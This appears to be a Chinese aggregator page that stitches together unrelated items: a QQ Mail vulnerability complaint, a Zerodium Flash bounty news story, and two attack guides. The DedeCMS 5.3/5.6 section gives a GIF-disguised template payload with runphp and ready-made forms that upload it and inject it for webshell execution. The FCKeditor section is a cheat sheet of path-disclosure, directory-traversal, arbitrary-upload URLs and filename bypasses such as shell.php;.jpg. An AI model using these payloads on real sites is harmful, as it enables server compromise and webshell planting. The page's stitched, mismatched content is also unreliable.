61阅读

qq最新漏洞-QQ邮箱更新成空谈 又见QQ邮箱新漏洞

发布时间:2017-11-12 所属栏目:fckeditor配置

一 : QQ邮箱更新成空谈 又见QQ邮箱新漏洞

  在这个动荡的时节,腾讯貌似没有抢到多少风头

  不过QQ邮箱新漏洞的发现又将使其QQ产品火一把

  查看官方空间其称9.3号对其邮箱进行了更新

  

 

  不过看完漏洞动画,突然觉得那大的腾讯对待用户似乎还是欠缺了点责任感

  

 

  别无它意,只是门户网站在IT界争夺市场的时候是不是该对本身产品的质量做些考虑呢?

  

 

  突然某天打开我的QQ邮件,然后挂了,我想我以后肯定开QQ邮箱的时候长个心眼

  发展的同时是否应该多考虑自身产品的可信性.....

二 : DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6

DEDECMS 5.6最新Get Shell漏洞
影响版本:  DEDECMS 5.3/5.6
  漏洞描述:
  DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于 DedeCms核心,是目前国内应用最广泛的php类CMS系统。
  article_add.php


........................
else if($dopost=='save')
{
include(DEDEMEMBER.'/inc/archives_check.php');
//分析处理附加表数据
$inadd_f = $inadd_v = '';
if(!emptyempty($dede_addonfields))
{
$addonfields = explode(';',$dede_addonfields);
............................................ //省略部份代码
$inadd_f .= ','.$vs[0];
$inadd_v .= " ,'".${$vs[0]}."' ";
}
}
}
..........................................
$addtable = trim($cInfos['addtable']);
if(emptyempty($addtable))
{
......................................
}
else
{
$inquery = "INSERT INTO `{$addtable}`(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";
if(!$dsql->ExecuteNoneQuery($inquery))
{
..........................................
}
}
..........................................
$artUrl = MakeArt($arcID,true); //利用地方(arc.archives.functions.php有定义)
function MakeArt($aid,$ismakesign=false)
{
global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
include_once(DEDEINC.'/arc.archives.class.php');
if($ismakesign)
{
$envs['makesign'] = 'yes';
}
$arc = new Archives($aid);
$reurl = $arc->MakeHtml(); //arc.archives.class.php有定义
............................
}


  arc.archives.class.php


class Archives
{
................
function __construct($aid)
{
............
if($this->ChannelUnit->ChannelInfos['addtable']!='')
{
$query = "SELECT * FROM `{$this->ChannelUnit->ChannelInfos['addtable']}` WHERE `aid` = '$aid'";
$this->addTableRow = $this->dsql->GetOne($query);
}
........................
if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)
{
if(is_array($this->addTableRow))
{
...............................
$this->Fields['templet'] = $this->addTableRow['templet'];//注意1
......................................
}
}
.............................
}
function MakeHtml($isremote=0)
{
global $cfg_remote_site,$fileFirst;
if($this->IsError)
{
return '';
}
$this->Fields["displaytype"] = "st";
//预编译$th
$this->LoadTemplet(); //触发1
......................................//省略部份代码
$this->arseDMFields($i,1);
$this->dtp->SaveTo($truefilename); //触发2
......................................
}
继续跟(触发1)$this->LoadTemplet(); //arc.archives.class.php有定义
function LoadTemplet()
{
if($this->TempSource=='')
{
$tempfile = $this->GetTempletFile(); //注意2
if(!file_exists($tempfile) || !is_file($tempfile))
{
echo "文档ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}
";
echo "模板文件不存在,无法解析文档!";
exit();
}
$this->dtp->LoadTemplate($tempfile); //触发3
$this->TempSource = $this->dtp->SourceString;
}
else
{
$this->dtp->LoadSource($this->TempSource);
}
}
看注意2 的$this->GetTempletFile() //arc.archives.class.php有定义
function GetTempletFile()
{
global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;
$cid = $this->ChannelUnit->ChannelInfos['nid'];
if(!emptyempty($this->Fields['templet'])) //注意3
{
$filetag = MfTemplet($this->Fields['templet']);
if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;
}
else
{
$filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
}
.......................................
if($cid=='spec')
{
if( !emptyempty($this->Fields['templet']) )
{
$tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;
}
else
{
$tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
}
}
...........................................
return $tmpfile;
}


注意3中的值来自注意1是通过查表得来的,控制了它就等于控制了任意模板,然后通过触发3来触发漏洞
看下怎么控制注意1的值
article_edit.php


......................
else if($dopost=='save')
{ ....................
if(!emptyempty($dede_addonfields))
{
$addonfields = explode(';',$dede_addonfields);
if(is_array($addonfields))
{
........................
${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);
$inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";
}
}
...................
if($addtable!='')
{
$upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";
if(!$dsql->ExecuteNoneQuery($upQuery))
{..............
}
}
....................
}


$dede_addonfields没有过滤,我们可以构造$inadd_f为,templet='上传的模板图片地址',包含我们的图片后,再通过触发2来生成图片里的后门!

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo(); {/dede:field}
保存为1.gif


<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 2. <input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" /> 4. <input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" /> 6. <input name="title" type="hidden" id="title" value="1.jpg"
class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/> 8. <button class="button2" type="submit" >更改</button>
</form>


构造如上表单,上传后图片保存为/uploads/userup/3/1.gif 发表文章,然后构造修改表单如下:



<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" /> 3. <input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 5. <input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" /> 7. <input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100"
class="intxt"/> 9. <input type="text" name="writer" id="writer" value="123456" maxlength="100"
class="intxt" style="width:219px"/>
<select name='typeid' size='1'> 11. <option value='1'
class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'> 13. <option value='0' selected>请选择分类...</option>
<option value='1'
class='option3' selected>aa</option></select> 15. <textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet"> 17. <input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 19. <button class="button2" type="submit">提交</button>
</form>


安全建议:
如果您使用了DedeCMS程序,因目前DedeCMS暂未发布补丁修复,请立即按如下流程处理:
1.在dedecms的后台更新补丁,尽可能升级为最新版本。
2.data、templets、uploads、install这几个目录用控制面板的“目录保护”功能 禁止执行权限 。
3.如果只是使用文章系统并没有使用会员功能,则强推推荐:关闭会员功能、关闭新会员注册、直接删除member目录或改名。
4.用dedecms后台的“系统”中的文件校验和病毒扫描功能 查杀病毒木马。
5.检查有无/data/cache/t.php 、/data/cache/x.php和/plus/index.php 这些木马文件,有的话则应立即删除。
6.用虚拟主机控制面板中的“查杀病毒 ”功能全面查杀一次。
请及时关注dedecms的最新补丁,如果官方出新补丁,则应立即更新。

厂商补丁EDECMS------------目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dedecms.com/

三 : 漏洞也有“黑市”:干掉最新版Flash 可获10万美元

  自Adobe公司上次Flash播放器更新20.0.0.270版已经过去了一周,漏洞商业利用市场已经对绕过这些安全更新产生了新的兴趣。

  

漏洞“黑市”:攻破新版Flash赏金10万美元

 

  漏洞交易平台Zerodium近日在推特上宣布,愿意为攻破最新版Flash“堆隔离”特性的人员支付10万美金。这种内存防御机制可以让利用某些类型的安全漏洞更加困难,也意味着黑客最近几年用于注入恶意软件的手段不再管用。

  Adobe在2015年早些时候与谷歌Project Zero漏洞研究团队合力开发了这项新功能,与此同时,Project Zero团队也报告称Flash Player三分之一的漏洞已在2015年内修复。

  Adobe公司首席科学家菲勒斯·尤利(Peleus Uhley)在去年12月21日发表的一篇博文中称,谷歌Project Zero开发了堆隔离特性的向量,Adobe公司则将该保护手段推广到了ByteArray类。“在上周发布之后,Adobe重写了内存管理器,以扩大堆隔离特性的应用范畴。”

  本月月内,Zerodium对能够绕过堆隔离特性和沙箱机制的手段悬赏10万美金。不能够绕过沙盒,但能够击败堆隔离机制的手段则能够拿到6.5万美元。

  Chaouki Bekrar在去年建立了Zerodium,他是现在已经接解散的法国漏洞研究公司Vupen Security的创始人,这家公司因制造并向政府销售漏洞而知名。Zerodium的目标和Vupen类似,但与制造自己的漏洞不同,它从第三方研究人员手中获取漏洞。Zerodium对漏洞的要求很苛刻:高风险级,能够可靠利用,基于现代操作系统、软件及设备,未被报告给受影响厂商。Zerodium公司声称能够为订购其安全研究服务的客户提供所需的漏洞信息,外加防护措施和安全建议。这些客户包括“国防、科技、财经领域需要零日漏洞防护的主要企业,以及需要特定和定制安全能力的政府组织。”

  Zerodium等漏洞收集平台提供的高回报对于安全研究人员而言很难拒绝,吸引他们不向受影响厂商上报漏洞,而是拖延软件更新的进度,让用户在更长时间内处在不安全状态中。在赏金方面,很少有软件制造商能够达到漏洞收集平台的水平。

  今年九月,Zerodium为能够入侵iOS9的浏览器漏洞出价100万美金。11月,该平台发表声明称已有小组拿到了悬赏。

四 : Fckeditor漏洞最新整理

1、查看编辑器版本

/fckeditor/editor/dialog/fck_about.html

2、爆绝对路径

FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)

/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx2.5可突破

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

3、遍历目录

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录:

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

也可以直接浏览盘符:

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

4、jsp上传
/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

5、Version < =2.4.2 For php 在处理PHP 上传的地方并未对Media类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

1<</code>formid="frmUpload"enctype="multipart/form-data"action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media"method="post">Uploada new file:<</code>br><</code>inputtype="file"name="NewFile"size="50"><</code>br><</code>inputid="btnUpload"type="submit"value="Upload"></</code>form>

6、 FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK的变化。试试上传1.asp;jpg
6.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。
6.2:继续上传同名文件可变为shell.php;(1).jpg也可以新建1个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。

7、 突破建立文件夹
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

8、 FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

9、最古老的漏洞,Type文件没有限制!

我接触到的第1个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren这样即可建立1个叫hsren的文件夹,1个新类型,没有任何限制,可以上传任意脚本!

10、browser

FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

本文标题:qq最新漏洞-QQ邮箱更新成空谈 又见QQ邮箱新漏洞
本文地址: http://www.61k.com/1101512.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1